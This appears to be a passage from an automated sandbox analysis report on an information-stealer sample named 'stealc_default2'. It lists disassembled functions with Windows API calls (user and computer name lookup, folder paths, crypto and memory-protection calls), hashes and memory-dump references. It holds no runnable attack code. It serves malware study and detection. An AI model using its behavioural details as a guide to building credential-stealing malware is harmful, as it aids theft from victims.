GetFileAttributesA.KERNEL32(00000000,?,006A0117,?,00000000,?,00000000,006B0DAB,006B0DAA), ref: 006A8D9F

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7f508c1040345f628585171fd37027fe2dc7e6029bce4837131f28e58f250d3a
Instruction ID: 1b3afe36c61a3ded73ddd7ed83a9ee2d708e27e9b76933c3919a7edbb2c5f84e
Opcode Fuzzy Hash: 7f508c1040345f628585171fd37027fe2dc7e6029bce4837131f28e58f250d3a
Instruction Fuzzy Hash: A0F09270D01208ABCB04FFA4D5496ECBB75EB12310F10829AE866A7391DB746E56DF85

Function 006A8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 26c3430f1b2b4b3b3d66d316918b8f981454e2f74f62933a9651ae69249b1ca4
Instruction ID: bfb4b5f1b9039cb80dd7dba50730911997a07dcbf32a8f0727b4129fdd9c2a83
Opcode Fuzzy Hash: 26c3430f1b2b4b3b3d66d316918b8f981454e2f74f62933a9651ae69249b1ca4
Instruction Fuzzy Hash: 10E01A35A4034C6BDB91EB94CC96FAE737DAB44B01F004299BA0C5B1C0DE70AF858F91

Function 00691190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006A6A2B), ref: 006A7910
Part of subcall function 006A78E0: HeapAlloc.KERNEL32(00000000,?,?,?,006A6A2B), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: HeapAlloc.KERNEL32(00000000,?,?,?,006911B7), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

ExitProcess.KERNEL32 ref: 006911C6

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: a6e3665159accab79712cc8959997c63931ffd5e9e2767252090477bfdc04b75
Instruction ID: 069b4097e3ab851f671e0b413abcd8490f37df45d57493c7641bfed0db800985
Opcode Fuzzy Hash: a6e3665159accab79712cc8959997c63931ffd5e9e2767252090477bfdc04b75
Instruction Fuzzy Hash: 64E012B5E1430667CE4473F0BC0AB2A339EAB16745F24053DFA05D7602FE29EC00896E

Function 006A8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: f8d48de58cd26d7d999b1264b1de3567f5af96d8da01005703b962e912c31ea9
Instruction ID: fbddd6176f0232ef872eb4cd03adedaa5935f693a5914e28ea14746122e0e2d4
Opcode Fuzzy Hash: f8d48de58cd26d7d999b1264b1de3567f5af96d8da01005703b962e912c31ea9
Instruction Fuzzy Hash: F001E430A04108EFCB04DF98C585BACBBB2BF06308F288098E905AB391C7756E94DF85

Function 00699880 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,006A0759,?,?), ref: 00699888

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: ca580c2c80eec4c887e5e1775f73a394cfd083507750bb7d1b417b1af158fc23
Instruction ID: 4d440a64bdd0fd7e01b184d3eac06209c720c84a1e7d24b444caafe6f6f70d2b
Opcode Fuzzy Hash: ca580c2c80eec4c887e5e1775f73a394cfd083507750bb7d1b417b1af158fc23
Instruction Fuzzy Hash: 04F0D0B5D40208FFDF40EBA8D946B9EB7B9AB04300F108599E91597281E671AA14CB95

Non-executed Functions

Function 6C0D6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0D6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0D6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C0D6D26

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0D6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0D6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0D6D73
free.MOZGLUE(00000000), ref: 6C0D6D80
CertGetNameStringW.CRYPT32 ref: 6C0D6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C0D6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0D6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0D6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0D6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C0D6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0D6E34
CreateFileW.KERNEL32 ref: 6C0D6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C0D6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0D6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0D709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0D7103
free.MOZGLUE(00000000), ref: 6C0D7153
CloseHandle.KERNEL32(?), ref: 6C0D7176
__Init_thread_footer.LIBCMT ref: 6C0D7209
__Init_thread_footer.LIBCMT ref: 6C0D723A
__Init_thread_footer.LIBCMT ref: 6C0D726B
__Init_thread_footer.LIBCMT ref: 6C0D729C
__Init_thread_footer.LIBCMT ref: 6C0D72DC
__Init_thread_footer.LIBCMT ref: 6C0D730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0D73C2
VerSetConditionMask.NTDLL ref: 6C0D73F3
VerSetConditionMask.NTDLL ref: 6C0D73FF
VerSetConditionMask.NTDLL ref: 6C0D7406
VerSetConditionMask.NTDLL ref: 6C0D740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D741A
moz_xmalloc.MOZGLUE(?), ref: 6C0D755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0D7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0D7598
free.MOZGLUE(00000000), ref: 6C0D75AC

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

Strings

SHA256, xrefs: 6C0D6EC0
wintrust.dll, xrefs: 6C0D72CD
(, xrefs: 6C0D768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C0D72C8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: a454cf5ca35f45a59ac70460eef3b3a12d1443dc77249a7a8d4fcdf6adfe4f33
Instruction ID: 12b1595611fb961b9f55fe8935c715a6ed2476a2cb6f2067c5756431d8f337f9
Opcode Fuzzy Hash: a454cf5ca35f45a59ac70460eef3b3a12d1443dc77249a7a8d4fcdf6adfe4f33
Instruction Fuzzy Hash: 4C52D4B1A003159BEB21DF28CC84BAA77F8EF45708F118599E9199B640DB70BF85CF91

Function 6C10F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10F09B

Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C10F0AC

Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C10F0BE

Part of subcall function 6C0E5C50: __aulldiv.LIBCMT ref: 6C0E5DB4
Part of subcall function 6C0E5C50: LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C10F155
GetCurrentThreadId.KERNEL32 ref: 6C10F1E0
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F1ED
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F212
GetCurrentThreadId.KERNEL32 ref: 6C10F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F248
GetCurrentThreadId.KERNEL32 ref: 6C10F2AE
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F2BB
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F2F8

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10F350
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F35D
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F381
GetCurrentThreadId.KERNEL32 ref: 6C10F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F3A0
GetCurrentThreadId.KERNEL32 ref: 6C10F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F491

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F3CF

Part of subcall function 6C10F070: GetCurrentThreadId.KERNEL32 ref: 6C10F440
Part of subcall function 6C10F070: AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F44D
Part of subcall function 6C10F070: ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C10F4A8
GetCurrentThreadId.KERNEL32 ref: 6C10F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F561
GetCurrentThreadId.KERNEL32 ref: 6C10F577
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F585
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C10F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C10F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C10F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C10F56A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: a3f5b91a3b2b83331eaae4e43ae001530646ae7e9f67fc6b0b80cdfc813b63fd
Instruction ID: 036fd2e8f1bba4ae834b0370474db7c6b0c8b71608de556af70390913e8f2f25
Opcode Fuzzy Hash: a3f5b91a3b2b83331eaae4e43ae001530646ae7e9f67fc6b0b80cdfc813b63fd
Instruction Fuzzy Hash: D7D116757042048FDB00FF68D4157AA77F8EB8632CF14862AE93593B81DF749809DBA6

Function 6C0D64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0D64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0D64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C0D6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C0D6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0D652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C0D671C
GetCurrentProcess.KERNEL32 ref: 6C0D6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0D672F
GetCurrentProcess.KERNEL32 ref: 6C0D6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0D6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C0D6A80
GetSystemInfo.KERNEL32(?), ref: 6C0D6ABE
__Init_thread_footer.LIBCMT ref: 6C0D6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D6AF7

Strings

detoured.dll, xrefs: 6C0D64DA
_etoured.dll, xrefs: 6C0D64ED
nvd3d9wrap.dll, xrefs: 6C0D6500
nvdxgiwrap.dll, xrefs: 6C0D6513
user32.dll, xrefs: 6C0D6526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C0D6798

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
